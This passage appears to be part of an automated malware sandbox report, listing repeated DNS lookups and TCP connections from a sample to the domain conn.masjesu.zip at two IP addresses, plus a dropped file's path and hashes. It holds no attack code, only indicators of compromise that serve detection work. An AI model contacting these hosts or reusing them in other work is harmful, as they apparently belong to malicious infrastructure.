| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |